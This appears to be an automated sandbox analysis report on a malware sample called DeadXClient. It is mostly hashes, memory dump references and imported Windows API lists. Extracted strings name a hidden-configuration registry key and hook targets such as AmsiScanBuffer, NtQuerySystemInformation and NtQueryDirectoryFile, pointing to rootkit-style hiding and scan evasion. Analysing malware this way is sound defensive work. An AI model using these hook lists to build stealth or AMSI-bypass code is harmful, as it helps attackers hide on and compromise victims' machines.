Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a856d4d34b0307f105be0f4dcf07cd109e6ea201eee798a654e4354f7af9e59
• Instruction ID: e516295fd018af281aa69652c43b71b3f694a0d2a7651f6bf1c7af71a09bc4f3
• Opcode Fuzzy Hash: 7a856d4d34b0307f105be0f4dcf07cd109e6ea201eee798a654e4354f7af9e59
• Instruction Fuzzy Hash: D531813150D7488FDB55DFA8D885AEABBF0FF56320F0482AFD049C7552D764A805CB51
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0261f20686995a4070ef12af179b8ef08fd52559b45ebc5b6989b06a656d634e
• Instruction ID: b99a5777c74c116bf8ba0e1c36c83e0482d26cd1fb9ab44164609d3bf6659531
• Opcode Fuzzy Hash: 0261f20686995a4070ef12af179b8ef08fd52559b45ebc5b6989b06a656d634e
• Instruction Fuzzy Hash: 2431E27171CA898FEB96EB38C8A65797BE0FF56301B4501BAD048C7296CF78A841C741
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e10f1f3191ec5133f340d32fe8943ecf3bddffe14ea93edd0643b530db6d57d3
• Instruction ID: 06c2285bdf858f99a0b780a3c4e2f05f5b0dd159e734543de9d20cf3010ee672
                                                                                                                                                                                  • Opcode Fuzzy Hash: e10f1f3191ec5133f340d32fe8943ecf3bddffe14ea93edd0643b530db6d57d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F210A63B1C9550FF7A9A66C54762F977C2EFC9250B44067ED18FD32CAED5CA8024381
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8583c48794e3ff1efa577a6512bb1ef5e729998bff59aa5d798cc776b1c3ed72
                                                                                                                                                                                  • Instruction ID: 6fa70bfd71d34cbe2a4764447c2d4b09a015506ffd7d6104333ef516a8f29c13
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8583c48794e3ff1efa577a6512bb1ef5e729998bff59aa5d798cc776b1c3ed72
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34215732B4D6CA0FE746976448615F67BE1EF8B310F0541BAD28EC31D6CD6C9842D751
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7f9297b083c8c637170820cdd622ce39f490bbc9b56e29a51adc85360c93c943
                                                                                                                                                                                  • Instruction ID: b6cd833c9682d3b09a1aeb05af032e20f5420d7db3b56ddf41032322fd7a07c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f9297b083c8c637170820cdd622ce39f490bbc9b56e29a51adc85360c93c943
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0321F010B5CA998BEB56B3AC98B63B977D1EF49300F5501B9E00CC32C7DD6CA8008792
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e566fe764558eaf860be9ddb3b4deb3e3f7dec6aaec9b31d01f1ec31f411647f
                                                                                                                                                                                  • Instruction ID: 704ec170d8cc5c005545730bcd8ca835902a947de07de5ab68ab0226f9193a3a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e566fe764558eaf860be9ddb3b4deb3e3f7dec6aaec9b31d01f1ec31f411647f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8111C110B689199BFB55F7AC94A67BA73D6EF49700F510579E00CC32C7DE6CA8008B92
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9ad05ebd12f333a40d13b110e271bd6b4a5ef6c8982b04b0b0478386d7845525
                                                                                                                                                                                  • Instruction ID: a5693697fcf686177fd7f9ee52475022e9403a518d74ee25d754370714b1e724
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ad05ebd12f333a40d13b110e271bd6b4a5ef6c8982b04b0b0478386d7845525
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13110432B08A894FFB52E76898A65FD7BE1FF5A310F0501B2E50CC7296DE586C114382
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2abbd2ff43914b723ee0461c24b9c7605ad53c66bcfb20a57214e3e7c181d2c4
                                                                                                                                                                                  • Instruction ID: 3b42add12f583997b39fda2b18b33642dab1b5a0d4a153c33f8c5e03e8cd3802
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2abbd2ff43914b723ee0461c24b9c7605ad53c66bcfb20a57214e3e7c181d2c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD017B12E0DB850FE345A63C58B55717FE0DFD7650B4804BBE488C619BEC4C6D40C392
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a47384b61f47bf0bd90caae6a682973512a8402f1535a1d7610b825183bde0ca
                                                                                                                                                                                  • Instruction ID: 48f066c2f10fc76dd6de0de4cc4e43e446b2ef81f9925add33bbb3c8cb21ae4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a47384b61f47bf0bd90caae6a682973512a8402f1535a1d7610b825183bde0ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B01AD72E0891E4BEF54BBA8845A1FE77F1FF59311F00027AD50DD2185DE7869008781
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1126906035198de4d470985ec19dc10cfdaa364a2f354f13e32bddc5deed8edd
                                                                                                                                                                                  • Instruction ID: 5aa160005f82fce3829f0d1cad5b78f4477c65a10776ca4c8ed1784987cf1412
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1126906035198de4d470985ec19dc10cfdaa364a2f354f13e32bddc5deed8edd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29F05E6289E3C91FD70357705C355E67FB4AF43100B0E41EBE588CB0A7DA1D65199363
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 76eee9534e2b0675affe4b2857b2fbdaea75e17ab4574a812234f24c2729823b
                                                                                                                                                                                  • Instruction ID: 3d18cf3b0b41cd0af85b4ac0a967952919ce3de53d02089e204aaed4980c3540
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76eee9534e2b0675affe4b2857b2fbdaea75e17ab4574a812234f24c2729823b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F08C72E1491E8BEB50BBA8845A1FE77F1EF58302F00026BE40DD2255DE3469408781
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 953ecd11a669c00a7a1f2e1948a242fc193f864197f5cb8de8ee6b5be438d852
                                                                                                                                                                                  • Instruction ID: 9e07ffbfc82c7307ea241fe06471863ccfeafa6aa9989863280b39b9945adb19
                                                                                                                                                                                  • Opcode Fuzzy Hash: 953ecd11a669c00a7a1f2e1948a242fc193f864197f5cb8de8ee6b5be438d852
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5201D102F0C6460BFB65767848B62B92B81EF86310F4500B9E24DC21D7EEAE68429341
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: daa77cf359383cf4449919a8dcbf979bbf93ca7cad4a98737fc8ef89c2a99f3d
                                                                                                                                                                                  • Instruction ID: 818dfad417aea3c1bd46ef29c4ab0af3bf8758bd356d6b9b735814a87faab523
                                                                                                                                                                                  • Opcode Fuzzy Hash: daa77cf359383cf4449919a8dcbf979bbf93ca7cad4a98737fc8ef89c2a99f3d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB09202F6E846409504327948A20A8BBA09F8B120FD604F0D588C808A988D28966A82
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3d5db550849b09e0ded0442fffbbf82b30129ba6ef9ab1371ac793b4fcee9e34
                                                                                                                                                                                  • Instruction ID: d2a033179048d318c767659061ce961dfcd8e0aef6a70760e8ffebc5404ac5c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d5db550849b09e0ded0442fffbbf82b30129ba6ef9ab1371ac793b4fcee9e34
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCA00205D9784F01984871BE1DD70B474505FCB118FC62170E90CD458AE8CE65E91297
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32 ref: 1C5981CC
                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C5981F9
                                                                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C598213
                                                                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C598254
                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C5982A8
                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C5982C9
                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C5982D4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                                                                                                                                                  • Instruction ID: c3d2fea52230d97fad45fe3ffb288519cdfcceddd6d195eab97b8e468d4496f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98313C76205F80CAEB608F61E850BDE7375F798748F44452ADA4E47B99EF78C248C714
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 1C59B6A5
                                                                                                                                                                                  • RtlLookupFunctionEntry.NTDLL ref: 1C59B6BD
                                                                                                                                                                                  • RtlVirtualUnwind.NTDLL ref: 1C59B6F8
                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 1C59B731
                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1C59B73B
                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 1C59B746
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                  • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                                                                                                                                                  • Instruction ID: c9d1b6d360b5e2f3b4bc734c37b91b56c749f971733ea635e81c94ca8f221573
                                                                                                                                                                                  • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB313236214F80D6E720CF65E8407DE73A5F788B58F500216EA9D47B68DF78C159CB10
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1443284424-0
                                                                                                                                                                                  • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                                                                                                                                                  • Instruction ID: 58e91b258544dea7587822cdff1f9966fd99d676f2097aeb169e4ecd538b64b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6ED1FD72B24B908AE700CF66D4802DE7BB1F385BD8F108616DE9E57B58EA38C45BC710
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C591633
                                                                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C591642
                                                                                                                                                                                    • Part of subcall function 1C591268: GetProcessHeap.KERNEL32 ref: 1C59126E
                                                                                                                                                                                    • Part of subcall function 1C591268: HeapAlloc.KERNEL32 ref: 1C59127D
                                                                                                                                                                                    • Part of subcall function 1C591268: GetProcessHeap.KERNEL32 ref: 1C591297
                                                                                                                                                                                    • Part of subcall function 1C591268: HeapAlloc.KERNEL32 ref: 1C5912A8
                                                                                                                                                                                    • Part of subcall function 1C591000: GetProcessHeap.KERNEL32 ref: 1C591006
                                                                                                                                                                                    • Part of subcall function 1C591000: HeapAlloc.KERNEL32 ref: 1C591015
                                                                                                                                                                                    • Part of subcall function 1C591000: GetProcessHeap.KERNEL32 ref: 1C591028
                                                                                                                                                                                    • Part of subcall function 1C591000: HeapAlloc.KERNEL32 ref: 1C591037
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5916B2
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5916DF
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5916F9
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591719
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591734
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591754
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C59176F
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C59178F
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5917AA
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5917CA
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5917E5
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591805
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591820
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591840
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C59185B
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C59187B
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591896
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5918A0
                                                                                                                                                                                    • Part of subcall function 1C5912BC: RegQueryInfoKeyW.ADVAPI32 ref: 1C591319
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C591327
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C591338
                                                                                                                                                                                    • Part of subcall function 1C5912BC: RegEnumValueW.ADVAPI32 ref: 1C591397
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C5913DF
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C5913ED
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C59140A
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapFree.KERNEL32 ref: 1C591418
                                                                                                                                                                                    • Part of subcall function 1C5912BC: lstrlenW.KERNEL32 ref: 1C591421
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C59142F
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C59143D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                  • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                  • API String ID: 2135414181-3864762265
                                                                                                                                                                                  • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                                                                                                                                                  • Instruction ID: 0f415d126fe9b085e8abf1462f11578430e9dc9b7cc287b780d62b5f9fdbc58a
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C710836310E5186EB109F67E890B9A77B5FB89B8CF001255DE4E47B28EF38D489C754
APIs
• GetCurrentThread.KERNEL32 ref: 1C591D47
  • Part of subcall function 1C5920C0: GetModuleHandleA.KERNEL32(?,?,?,1C591D79), ref: 1C5920D8
  • Part of subcall function 1C5920C0: GetProcAddress.KERNEL32(?,?,?,1C591D79), ref: 1C5920E9
  • Part of subcall function 1C595F50: GetCurrentThreadId.KERNEL32 ref: 1C595F8B
Strings
Memory Dump Source
• Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
• Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
• API String ID: 4175298099-4225371247
APIs
Strings
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
APIs
• PdhGetCounterInfoW.PDH ref: 1C59310E
• GetProcessHeap.KERNEL32 ref: 1C59311F
• HeapAlloc.KERNEL32 ref: 1C59312D
• PdhGetCounterInfoW.PDH ref: 1C593143
• StrCmpW.SHLWAPI ref: 1C593158
  • Part of subcall function 1C593558: StrCmpNW.SHLWAPI ref: 1C59357A
  • Part of subcall function 1C593558: StrStrW.SHLWAPI ref: 1C593594
  • Part of subcall function 1C593558: StrToIntW.SHLWAPI ref: 1C5935BB
• GetProcessHeap.KERNEL32 ref: 1C593185
• HeapFree.KERNEL32 ref: 1C593193
Strings
• \GPU user(*)\Utilization Percentage, xrefs: 1C593151
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU user(*)\Utilization Percentage
• API String ID: 1943346504-3507739905
APIs
Strings
Similarity
• API ID: AddressHandleModuleProclstrlen
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 3607816002-3850299575
APIs
Strings
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1C597958
• __scrt_acquire_startup_lock.LIBCMT ref: 1C5979AA
• _RTC_Initialize.LIBCMT ref: 1C5979D8
• __scrt_dllmain_after_initialize_c.LIBCMT ref: 1C5979FE
• __scrt_release_startup_lock.LIBCMT ref: 1C597A29
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
APIs
• LoadLibraryExW.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999B5
• GetLastError.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999C3
• LoadLibraryExW.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999ED
• FreeLibrary.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C599A33
• GetProcAddress.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C599A3F
Strings
Memory Dump Source
